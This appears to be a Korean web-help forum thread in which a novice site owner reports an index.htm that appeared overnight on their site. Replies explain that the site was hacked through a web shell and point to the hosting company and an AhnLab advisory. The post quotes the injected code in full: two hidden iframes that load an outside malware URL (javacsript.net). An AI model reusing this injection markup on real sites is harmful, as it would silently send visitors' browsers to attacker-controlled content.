index.htm 이 또 생겼네요; 정보
index.htm 이 또 생겼네요;본문
원래 index.php가 메인파일이고,
htm 파일은 없었는데, 지금 막 살펴보니 하룻밤새 index.htm 파일이 생겼습니다.
내용은 이렇고요
--------------------------------------------------------------
<iframe wdwil='AfflBwUE' uisyl='samn0lkO' rrrfi='E3jdUTrL' hgtvp='ONzBvtwR' src='http://javacsript.net/index/in.cgi?5 ' mrfoj='4Av9EWfR' width='17' height='539' style='display:none'></iframe>
<iframe bmvun='wnQ1UVfr' iumgh='w1gY99rB' vtpfn='2CMRkWVy' wlroc='iutBQEKQ' src='http://javacsript.net/index/in.cgi?5 ' jbqdn='K6XZO2sJ' width='204' height='58' style='display:none'></iframe>
---------------------------------------------------------------
저번에 생겼던 거랑 똑같은것같은데, 이것때문에 홈페이지가 잠시 안들어가졌습니다.
저번엔 그냥 삭제했는데, 이번엔 삭제하지 않고..
index.htm 파일 내용을 index.php 랑 똑같이 해놨고요..
이건 도대체 무슨 파일이길래 자꾸 생기는 걸까요 ;
htm 파일은 없었는데, 지금 막 살펴보니 하룻밤새 index.htm 파일이 생겼습니다.
내용은 이렇고요
--------------------------------------------------------------
<iframe wdwil='AfflBwUE' uisyl='samn0lkO' rrrfi='E3jdUTrL' hgtvp='ONzBvtwR' src='http://javacsript.net/index/in.cgi?5 ' mrfoj='4Av9EWfR' width='17' height='539' style='display:none'></iframe>
<iframe bmvun='wnQ1UVfr' iumgh='w1gY99rB' vtpfn='2CMRkWVy' wlroc='iutBQEKQ' src='http://javacsript.net/index/in.cgi?5 ' jbqdn='K6XZO2sJ' width='204' height='58' style='display:none'></iframe>
---------------------------------------------------------------
저번에 생겼던 거랑 똑같은것같은데, 이것때문에 홈페이지가 잠시 안들어가졌습니다.
저번엔 그냥 삭제했는데, 이번엔 삭제하지 않고..
index.htm 파일 내용을 index.php 랑 똑같이 해놨고요..
이건 도대체 무슨 파일이길래 자꾸 생기는 걸까요 ;
웹초보라 뭔지 모르겠네요...
댓글 전체
해킹을 당하셨군요.
중국해킹으로 보입니다.
중국해킹으로 보입니다.
헐 ㅠㅠ 그런가요...
걍 인덱스.에이치엠엘 하나 만들어서 포워딩 해버리세요..
하단에 코드 삽입해서 로그 분석 함 때려보시던지..
아이프레임 꽂아놓은거 보니 쩝...
하단에 코드 삽입해서 로그 분석 함 때려보시던지..
아이프레임 꽂아놓은거 보니 쩝...
로그 분석...그런 소스 만들 능력이 안되서요 ㅠ
미리내 계정이라 로그 분석기가 있긴 하던데...
미리내 계정이라 로그 분석기가 있긴 하던데...
100% 중국 아이피입니다. 웹쉘을 대상 서버에 업로드한 후 웹을 이용해 시스템 명령어를 수행하기 때문에 네트워크 방화벽 영향을 받지 않고 서버를 제어할 목적에 장난처럼 보여지는데 공격자가 툴을 사용한 듯 보이네요. 다른 뜻?으로 공격을 가한다면 더 심각한 상황이 생길 수 있으니 호스팅 업체와 상담해 보세요. 그리고 한번 노출된 사이트는 지속적인 공격을 받게 되니 한번에 조치로 안심하지 마시고 주의깊게 상황을 보셔야 합니다.
무슨 뜻인지는 모르겠지만 ㅠㅠ <<웹초보
일단 호스팅 업체에 연락하겠습니다.
일단 호스팅 업체에 연락하겠습니다.
웹셀===http://imagesearch.naver.com/search.naver?where=idetail&rev=4&query=webshell&from=image&ac=-1&sort=0&res_fr=0&res_to=0&merge=0&spq=0&start=1&a=pho_l&f=nx&r=1&u=http%3A%2F%2Fblog.naver.com%2Flon3523%3FRedirect%3DLog%26logNo%3D38914510&thumbnail=http%3A%2F%2Fthumbview02.search.naver.com%2Fthumbnails%3Fq%3Dhttp%3A%2F%2Fblogfiles.naver.net%2Fdata20%2F2007%2F6%2F20%2F227%2Fwebshell_1-lon3523.jpg&signature=19127814430
저기 주소 넣고 보시면 그냥 이런거구나!라고 생각이 들겁니다. 심각하겠죠? 그런데 요즘 님 뿐 아니라 대한민국 웹 전체가 중국아이피 때문에 힘들어하고 있습니다. 겁먹을 일은 아니고 그냥 배운다고 생각하시고 관련 검색어를 찾아 하나씩 이해해 보세요.
아래는 안철수 연구소의 관련문서페이지입니다.
http://kr.ahnlab.com/info/securityinfo/secuinfo/newSecuNewsView.ahn?category=001&mid_cate=001&cPage=1&seq=7673
좀 당해보면 귀찮아서 그렇지 그리 심각한 문제는 아닙니다. 근데 이놈들중 아주 거머리 같은 놈들이 간혹 있어서요.
성인사이트 하나 관리하면 별 생양아들 같은 공격등을 경험하게 되네요.
저기 주소 넣고 보시면 그냥 이런거구나!라고 생각이 들겁니다. 심각하겠죠? 그런데 요즘 님 뿐 아니라 대한민국 웹 전체가 중국아이피 때문에 힘들어하고 있습니다. 겁먹을 일은 아니고 그냥 배운다고 생각하시고 관련 검색어를 찾아 하나씩 이해해 보세요.
아래는 안철수 연구소의 관련문서페이지입니다.
http://kr.ahnlab.com/info/securityinfo/secuinfo/newSecuNewsView.ahn?category=001&mid_cate=001&cPage=1&seq=7673
좀 당해보면 귀찮아서 그렇지 그리 심각한 문제는 아닙니다. 근데 이놈들중 아주 거머리 같은 놈들이 간혹 있어서요.
성인사이트 하나 관리하면 별 생양아들 같은 공격등을 경험하게 되네요.
으흠...
그지같은것들. 왜 남들한테 피해를 주는건지;;
그지같은것들. 왜 남들한테 피해를 주는건지;;
그러게 말입니다;;;
소규모 커뮤니티라 그런건 안심하고 있었는데...
소규모 커뮤니티라 그런건 안심하고 있었는데...